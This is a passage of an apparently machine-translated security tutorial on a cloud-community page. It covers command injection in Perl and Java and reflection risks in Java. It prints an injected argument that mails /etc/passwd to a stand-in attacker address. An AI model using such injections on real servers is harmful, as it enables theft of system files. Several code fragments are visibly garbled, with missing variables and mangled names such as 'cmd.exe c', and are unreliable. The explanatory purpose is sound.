IV. String interpretation execution
In some programming languages, special functions can be inserted into input strings to fool the server to execute extra and extra actions. The following Perl code is an example:
= "Mail body ";
System ("/usr/sbin/sendmail-t <");
Obviously, this code can be used as part of the CGI program, or it can be called from the command line. Generally, it can be called as follows:
Perl script. pl honest@true.com
It will put an email (that is, "mail body ")
Send to user honest@true.com. Although this example is simple, we can launch attacks as follows:
Perl script. pl honest@true.com; mail
Cheat@liarandthief.com </etc/passwd
The command sent a blank message to the honest@true.com and the system password file to the cheat@liarandthief.com. If the code is part of the CGI program, it will pose a major threat to the server's security.
Perl programmers often use external programs (such as sendmail) to expand the functions of Perl, so as to avoid the use of scripts to implement the functions of external programs. However, Java has a well-developed API. For example, JavaMail API is a good API for sending emails. However, if you are relatively lazy and want to use an external email sending program to send an email:
Runtime.getruntime(cmd.exe c ("/usr/sbin/sendmail-t <");
In fact, this is not feasible. Generally, Java does not allow the OS-level "<STRONG and small class construction symbols to be part of runtime.exe c. You may try to solve this problem using the following methods:
Runtime.getruntime(cmd.exe c ("sh/usr/sbin/sendmail-t <");
However, this kind of code is insecure. It brings the danger of the previous Perl code into the Java program. Solving problems using the conventional Java method sometimes seems a little more complicated than a clever method, but it is almost always more portable and scalable, and more secure and has fewer errors. Runtime.exe c () is just a simple example of this problem. Many other situations are more complex and hidden.
Let's take a look at the Java Image API (Reflection API ). The Java Image API allows us to determine which method of the object to call at runtime. Any time when users enter commands as image search conditions may become a security weakness of the system. For example, the following code may cause such problems:
Method m = bean. getClass (). getMethod (action, new Class [] {});
M. invoke (bean, new Object []);
If the value of "action" allows users to change, special attention should be paid here. Note that this phenomenon may occur in some strange places-perhaps the most strange thing is JSP. Most JSP engines use the image API to implement the following functions:
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
